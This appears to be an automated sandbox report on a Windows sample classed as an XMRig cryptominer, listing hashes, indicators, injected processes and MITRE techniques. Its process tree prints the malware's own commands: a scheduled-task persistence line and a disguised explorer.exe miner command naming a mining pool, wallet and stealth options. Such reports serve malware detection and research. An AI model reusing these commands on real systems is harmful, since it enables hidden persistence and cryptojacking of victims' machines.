xmrig | 1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/04/2024, 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe
Size

2.1MB
MD5

e9dd7614c25f98ff32d0c9383bdb7599
SHA1

69c2f6d9466a870f2a29b90db7e88d0f06979a47
SHA256

1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd
SHA512

97151c4ad0fa4408f73764f91e980b0cb0c236e8551b0bf197c9f5a0516ded05fb5ab4cd540644960eb6d31aa0c5d633051903b3f20e3b41897ffad6b000b7a8
SSDEEP

49152:bYemLzwiFT74xXx5gYz6gjFic5cgGREIvM4Uw:seYCx73jneJZP

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral2/memory/3080-29-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-32-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-35-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-36-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-37-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-38-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-39-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-40-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-41-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-42-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-50-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-52-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-53-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3080-56-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
4568	services64.exe
4960	sihost64.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3916 set thread context of 3080	3916	conhost.exe	112

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3052	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4716	conhost.exe
4716	conhost.exe
3916	conhost.exe
3916	conhost.exe
3916	conhost.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
676	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4716	conhost.exe
Token: SeDebugPrivilege	3916	conhost.exe
Token: SeLockMemoryPrivilege	3080	explorer.exe
Token: SeLockMemoryPrivilege	3080	explorer.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2484 wrote to memory of 4716	2484	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	101
PID 2484 wrote to memory of 4716	2484	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	101
PID 2484 wrote to memory of 4716	2484	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	101
PID 4716 wrote to memory of 4428	4716	conhost.exe	103
PID 4716 wrote to memory of 4428	4716	conhost.exe	103
PID 4428 wrote to memory of 3052	4428	cmd.exe	105
PID 4428 wrote to memory of 3052	4428	cmd.exe	105
PID 4716 wrote to memory of 3460	4716	conhost.exe	106
PID 4716 wrote to memory of 3460	4716	conhost.exe	106
PID 3460 wrote to memory of 4568	3460	cmd.exe	108
PID 3460 wrote to memory of 4568	3460	cmd.exe	108
PID 4568 wrote to memory of 3916	4568	services64.exe	110
PID 4568 wrote to memory of 3916	4568	services64.exe	110
PID 4568 wrote to memory of 3916	4568	services64.exe	110
PID 3916 wrote to memory of 4960	3916	conhost.exe	111
PID 3916 wrote to memory of 4960	3916	conhost.exe	111
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 3916 wrote to memory of 3080	3916	conhost.exe	112
PID 4960 wrote to memory of 1540	4960	sihost64.exe	114
PID 4960 wrote to memory of 1540	4960	sihost64.exe	114
PID 4960 wrote to memory of 1540	4960	sihost64.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Creates scheduled task(s)
      PID:3052
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Users\Admin\AppData\Local\Temp\services64.exe
      C:\Users\Admin\AppData\Local\Temp\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4568
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3916
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4960
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:1540
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=46tF1GF7kHPa9JfVZ23MHCUaijLXmQd1WRnQoEMJSoWv7juuNWB9hzvEex9UUshieLPTz3X3mSz3MGxJ1gDyALWsQ6YNWeR --pass=STU --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4160 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:8
1⤵
PID:3692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
e9dd7614c25f98ff32d0c9383bdb7599

SHA1
69c2f6d9466a870f2a29b90db7e88d0f06979a47

SHA256
1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd

SHA512
97151c4ad0fa4408f73764f91e980b0cb0c236e8551b0bf197c9f5a0516ded05fb5ab4cd540644960eb6d31aa0c5d633051903b3f20e3b41897ffad6b000b7a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
30KB

MD5
a3d93d0fb52c65278112cf3a19e79b35

SHA1
afa77a644526e379146a2c1306458233ab42a7d7

SHA256
478cdadb36ccabf7bf9d0051d6ce0b3cc5504c5234012774853bf08f63c90af6

SHA512
0afdbaef084937595bf26cb9b950450a2c10834a86a56cbd9457c7141ae2010f7ef8aeb127c327c1a2d2e46212f3d5cb5c2c154cad4501fad8b64297fe6d35a7

Download Submit
memory/1540-58-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-57-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/1540-49-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-48-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-59-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-46-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/1540-60-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-47-0x000001E24C6C0000-0x000001E24C6D0000-memory.dmp

Filesize
64KB

Download
memory/1540-45-0x000001E24AEF0000-0x000001E24AEF6000-memory.dmp

Filesize
24KB

Download
memory/1540-44-0x000001E24AB80000-0x000001E24AB86000-memory.dmp

Filesize
24KB

Download
memory/3080-37-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-42-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-29-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-32-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-34-0x0000000000FD0000-0x0000000000FF0000-memory.dmp

Filesize
128KB

Download
memory/3080-56-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-55-0x0000000002E00000-0x0000000002E20000-memory.dmp

Filesize
128KB

Download
memory/3080-38-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-39-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-40-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-41-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-43-0x0000000001210000-0x0000000001230000-memory.dmp

Filesize
128KB

Download
memory/3080-54-0x0000000002DE0000-0x0000000002E00000-memory.dmp

Filesize
128KB

Download
memory/3080-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-52-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3080-50-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3916-19-0x000001A1690D0000-0x000001A1690E0000-memory.dmp

Filesize
64KB

Download
memory/3916-16-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/3916-17-0x000001A1690D0000-0x000001A1690E0000-memory.dmp

Filesize
64KB

Download
memory/3916-18-0x000001A1690D0000-0x000001A1690E0000-memory.dmp

Filesize
64KB

Download
memory/3916-33-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/4716-6-0x000001BC3DB60000-0x000001BC3DB72000-memory.dmp

Filesize
72KB

Download
memory/4716-4-0x000001BC3DB20000-0x000001BC3DB30000-memory.dmp

Filesize
64KB

Download
memory/4716-12-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/4716-0-0x000001BC3BBF0000-0x000001BC3BE10000-memory.dmp

Filesize
2.1MB

Download
memory/4716-5-0x000001BC3DB20000-0x000001BC3DB30000-memory.dmp

Filesize
64KB

Download
memory/4716-3-0x000001BC3DB20000-0x000001BC3DB30000-memory.dmp

Filesize
64KB

Download
memory/4716-2-0x00007FFC3B990000-0x00007FFC3C451000-memory.dmp

Filesize
10.8MB

Download
memory/4716-1-0x000001BC56750000-0x000001BC56970000-memory.dmp

Filesize
2.1MB

Download